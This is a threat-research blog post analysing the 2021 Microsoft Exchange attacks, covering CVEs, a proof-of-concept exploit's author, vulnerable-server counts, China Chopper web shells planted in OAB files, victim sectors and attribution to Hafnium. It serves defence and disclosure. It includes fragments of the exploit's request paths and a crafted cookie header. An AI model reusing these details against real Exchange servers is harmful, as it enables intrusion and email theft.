Posted on Mar 15, 2021
Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.
Although initially thought to have affected as many as 30,000-100,000 organizations, our analysis indicates that the number is far less than that. Using our proprietary technology to scan the internet for vulnerable, public-facing Microsoft Exchange servers revealed 2,500- 18,000 vulnerable public-facing servers worldwide, a majority of which are in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality by the perpetrators.
While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021 failure to install the necessary patch has left over 2,500 servers still vulnerable.
Other published assessments of the attack have concluded primary adversary for this attack according to open source information is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers, however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.
A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day, or previously unknown, vulnerabilities that enabled the attackers to execute remote code to manipulate the victim’s systems.
The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack and learn more about the threat actors and identify any potential victims.
The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065 & CVE-2021-26855. These vulnerabilities are part of an exploitation chain that when executed successfully in succession allows the attacker to conduct remote code execution within the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.
In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of these vulnerabilities. We were able to find evidence that proof of concept code had been developed to utilize these exploits.
During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.
Fig 1. Twitter posting (note screenshots have Chinese characters in them).
This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.
F 1.2 GitHub account belonging to author of email dumping Proof Of Concept
Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down, however other GitHub accounts are making reference to GreyOrder being the original author. We were able to find the original post by GreyOrder even though it was deleted through cached reference to the post.
Fig 1.3 CVEBase
Fig 1.4 POC discussion on GitHub
The following is what was found posted from GreyOrder on March 3, 2021, only to be later removed from repositories.
Fig 1.5 Original GitHub posting for GreyOrder POC exploit
GreyOrder discloses some of the conditions to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. In order to trigger the vulnerability, a few conditions have to exist.
The general behavior of this proof of concept exploit code is generally outlined below.
https:///owa/auth/x.js with headers
https:///ews/exchange.asmx. they send XML SOAP requests to https:///ecp/temp.js with the following headers:
Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml
Fig 1.6 Proof of Concept Exploit Demonstration
We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.
Fig 1.7 GreyOrder GitHub
The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many actual on-premise Exchange servers are exposed given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis.
The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.
Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that a majority predominantly appear in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as being still vulnerable or unpatched. We found less than 18,000 vulnerable public-facing servers world-wide through our research and analysis.
We can’t definitively say what drove the initial reports of significantly more organizations being hacked. It may be based on internal Microsoft telemetry of Exchange servers sold, or it may include servers behind a firewall which we would not be able to observe. Our numbers represent the number of Exchange servers that we observed from the Internet which is less than 18,000. Without additional information about the data upon which those reports were based, we can only speculate as to the discrepancy. As our research continues we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.
Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)
Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)
During our investigations, we focused on some of the technical aspects of the attacks such as the malware involved. We detected several malware files known as web shells related to this attack that were tagged as exploit CVE-2021-26855 & CVE-2021-27065. i.e. the web shells were specifically designed to be used with these vulnerabilities.
The adversary used the China Chopper web shell in this targeted attack.
The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a Graphical User Interface that provides an interface with the server-side component. Unlike other web shells that provide an HTML interface on the hacked server so that the attacker can interact with it when visiting the webpage containing the China Chopper web shell, no content is shown. Therefore, the attacker needs to use the client-side in order to interact with the China Chopper web shell. The client-side component provides the following capabilities on the affected server:
The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.
The first type is injected in the ExternalUrl field of the OAB (Offline Address Book) files. It checks if there are any files uploaded with the request and if yes, it saves it locally as an independent ASPX file.
The following example has a hardcoded ASPX file name:
We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:
The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.
The second type is also injected in the ExternalUrl field of the OAB files, but the injected content is different. It reads the value of an HTTP parameter and executes it on the server. An example of such an web shell is:
Since the attacker chooses the value for <aspx_file_name> in the first case and <parameter_name> in the second case, it is possible that these different approaches may indicate the presence of two different attackers.
As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.
Since the web shell was injected into the OAB files which are configuration files containing information about the servers they are running on, we managed to obtain the list of domains for the infected servers. Some of them are local domains while others are public.
The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:
Fig 2 - Distribution of ChinaChopper web shell parameters
Apart from these, we observed two clusters of similarly-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server. We observed each of these parameter names were used only once. The first cluster has parameter values that look like these: rxDg52fHL9GW, WHotfJjxFadX, EiH4yV2WGYgc, while the second one: 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, ce62a4a53e118ff82150522c663ddae6.
A full example of an infected OAB file from an infected Microsoft Exchange server follows:
Full OAB file
One objective of the analysis was to understand the victimology of this attack and determine if it aligns with a typical nation-state cyber offensive operation. We started with analyzing the discovered web shells and their capabilities, then we focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack. The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with the last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files. Additional research into the web shell dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerability was predominantly in EMEA.
Fig 2.1 Distribution of web shell Victims
While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.
Fig 2.2 Sector Victimology
We found cases in which the domains for the URLs specified in the OAB files are local and we wonder whether this means that there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.
In addition to China Chopper, we discovered other web shell code designed to check if products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on a condition of true [See below “if..fireeye...write 1”, “if..confer (CarbonBlack) write 2”, “if...crowdstrike...write3”]. We believe the attacker is likely collecting this information in an effort to understand victim environmental details. This web shell would allow for additional malware to be deployed to terminate the security software.
The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.
The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. There are multiple hypotheses that we rank different evidence against that either support or do not support that specific hypothesis.
Evidence that supports
Evidence that disproves
30,000 to 100,000 Microsoft Exchange servers are compromised
GreyOrder is a member of Hafnium
Techniques, Tactics & Procedures support a Nation State cyber offensive operation
While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those sectors previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may be currently being exploited by ransomware criminals we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.
Vendor management is the process an organization utilizes to assess and manage a third- or fourth-party vendor. Learn how SecurityScorecard can help.
Performing cybersecurity risk assessments is a key part of any organization’s information security management program. Read our guide.
Templates and vendor evaluations are needed to level that playing field, in a time efficient and fair way, so that the best vendors are chosen.
Co-founder and CEO, Alex Yampolskiy, speaks about the importance of measuring and acting on key indicators of cybersecurity risk.
You’ve invested in cybersecurity, but are you tracking your efforts? Check out our list of 20 cybersecurity KPIs you should track. Read more.
No waiting, 100% Free
Get your free scorecard and learn how you stack up across 10 risk categories. Answer a few simple questions and we'll instantly send your score to your business email.